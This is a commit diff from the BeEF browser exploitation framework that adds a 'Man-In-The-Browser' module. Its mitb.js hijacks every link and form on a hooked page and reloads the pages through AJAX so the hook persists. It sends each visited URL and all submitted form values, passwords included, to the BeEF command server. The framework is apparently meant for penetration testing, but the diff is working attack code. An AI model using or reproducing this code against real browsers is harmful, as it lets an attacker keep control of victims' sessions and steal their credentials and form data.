(Fixes issue 450) Ported MITB code from h.ackack.net!

git-svn-id: https://beef.googlecode.com/svn/trunk@1371 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

core/main/client/beef.js

@@ -31,6 +31,12 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		// This get set to true during window.onload(). It's a useful hack when messing with document.write().
 		pageIsLoaded: false,
 		
+		// An array containing functions to be executed by the window.onpopstate() method.
+		onpopstate: new Array(),
+		
+		// An array containing functions to be executed by the window.onclose() method.
+		onclose: new Array(),
+		
 		// An array containing functions to be executed by Beef.
 		commands: new Array(),
 		

core/main/client/init.js

@@ -28,6 +28,36 @@ window.onload = function() {
 	beef_init();
 }
 
+window.onpopstate = function(event) {
+	if(beef.onpopstate.length > 0) {
+			event.preventDefault;
+			for(var i=0;i<beef.onpopstate.length;i++){
+				var callback = beef.onpopstate[i];
+				try{
+					callback(event);
+				}catch(e){
+					console.log("window.onpopstate - couldn't execute callback: " + e.message);
+				}
+			return false;
+		}
+	}
+}
+
+window.onclose = function(event) {
+	if(beef.onclose.length > 0) {
+			event.preventDefault;
+			for(var i=0;i<beef.onclose.length;i++){
+				var callback = beef.onclose[i];
+				try{
+					callback(event);
+				}catch(e){
+					console.log("window.onclose - couldn't execute callback: " + e.message);
+				}
+			return false;
+		}
+	}
+}
+
 function beef_init() {
   if (!beef.pageIsLoaded) {
     beef.pageIsLoaded = true;

core/main/client/mitb.js

@@ -0,0 +1,135 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+beef.mitb = {
+	
+	cid: null,
+	curl: null,
+	
+	init: function(cid, curl){
+		beef.mitb.cid = cid;
+		beef.mitb.curl = curl;
+	},
+	
+	// Initializes the hook on anchors and forms.
+	hook: function(){ 	
+		beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
+		beef.onclose.push(function(event) {beef.mitb.endSession();});
+		var anchors = document.getElementsByTagName("a");
+		var forms = document.getElementsByTagName("form");
+		for(var i=0;i<anchors.length;i++){
+			anchors[i].onclick = beef.mitb.poisonAnchor;
+		}
+		for(var i=0;i<forms.length;i++){
+			beef.mitb.poisonForm(forms[i]);
+		}
+	},
+	
+	// Hooks anchors and prevents them from linking away
+	poisonAnchor: function(e){
+		try{
+			e.preventDefault;
+			if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
+				var title = "";
+				if(document.getElementsByTagName("title").length == 0){
+					title = document.title;
+				}else{
+					title = document.getElementsByTagName("title")[0].innerHTML;
+				}
+				history.pushState({ Be: "EF" }, title, e.currentTarget);
+			}
+		}catch(e){
+			console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+		}
+		return false;
+	},
+	
+	// Hooks forms and prevents them from linking away
+	poisonForm: function(form){
+		form.onsubmit=function(e){
+			var inputs = form.getElementsByTagName("input");
+			var query = "";
+			for(var i=0;i<inputs.length;i++){
+				if(i>0 && i<inputs.length-1) query += "&";
+				switch(inputs[i].type){
+					case "submit":
+						break;
+					default:
+						query += inputs[i].name + "=" + inputs[i].value;
+						break;
+				}
+			}
+			e.preventdefault;
+			beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
+			history.pushState({ Be: "EF" }, "", form.action);
+			return false;
+		}
+	},
+	
+	// Fetches a hooked form with AJAX
+	fetchForm: function(url, query, target){
+		try{
+			var y = new XMLHttpRequest();
+			y.open('POST', url, false);
+			y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+			y.onreadystatechange = function(){
+				if(y.readyState == 4 && y.responseText != ""){
+					target.innerHTML = y.responseText;
+					setTimeout(beef.mitb.hook, 10);
+				}
+			}
+			y.send(query);
+			beef.mitb.sniff("POST: "+url+" ["+query+"]");
+			return true;
+		}catch(x){
+			return false;
+		}
+	},
+	
+	// Fetches a hooked link with AJAX
+	fetch: function(url, target){
+		try{
+			var y = new XMLHttpRequest();
+			y.open('GET', url,false);
+			y.onreadystatechange = function(){
+				if(y.readyState == 4 && y.responseText != ""){
+					target.innerHTML = y.responseText;
+					setTimeout(beef.mitb.hook, 10);
+				}
+			}
+			y.send(null);
+			beef.mitb.sniff("GET: "+url);
+			return true;
+		}catch(x){
+			window.open(url);
+			beef.mitb.sniff("GET [New Window]: "+url);
+			return false;
+		}
+	},
+	
+	// Relays an entry to the framework
+	sniff: function(result){
+		try{
+			beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
+		}catch(x){}
+		return true;
+	},
+	
+	// Signals the Framework that the user has lost the hook
+	endSession: function(){
+		beef.mitb.sniff("Window closed.");
+	}
+}

core/main/handlers/modules/beefjs.rb

@@ -29,7 +29,7 @@ module Modules
       beefjs = '' 
       # @note location of sub files      
       beefjs_path = "#{$root_dir}/core/main/client/"
-      js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js)
+      js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js)
 
       # @note construct the beefjs string from file(s)
       js_sub_files.each {|js_sub_file_name|

modules/browser/man_in_the_browser/command.js

@@ -0,0 +1,29 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+
+beef.execute(function() {
+	try{
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "Browser hooked.");
+		beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
+		var MITBload = setInterval(function(){
+				if(beef.pageIsLoaded){
+					clearInterval(MITBload);
+					beef.mitb.hook();
+				}
+			}, 100);
+	}catch(e){
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "Failed to hook browser: " + e.message);
+	}
+});

modules/browser/man_in_the_browser/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        man_in_the_browser:
+            enable: true
+            category: "Browser"
+            name: "Man-In-The-Browser"
+            description: "This module will use a Man-In-The-Browser attack to ensure that the BeEF hook will stay until the user leaves the domain."
+            authors: ["mathias"]
+            target:
+                working: ["ALL"]
+                not_working: ["IE"]

modules/browser/man_in_the_browser/module.rb

@@ -0,0 +1,23 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+class Man_in_the_browser < BeEF::Core::Command
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end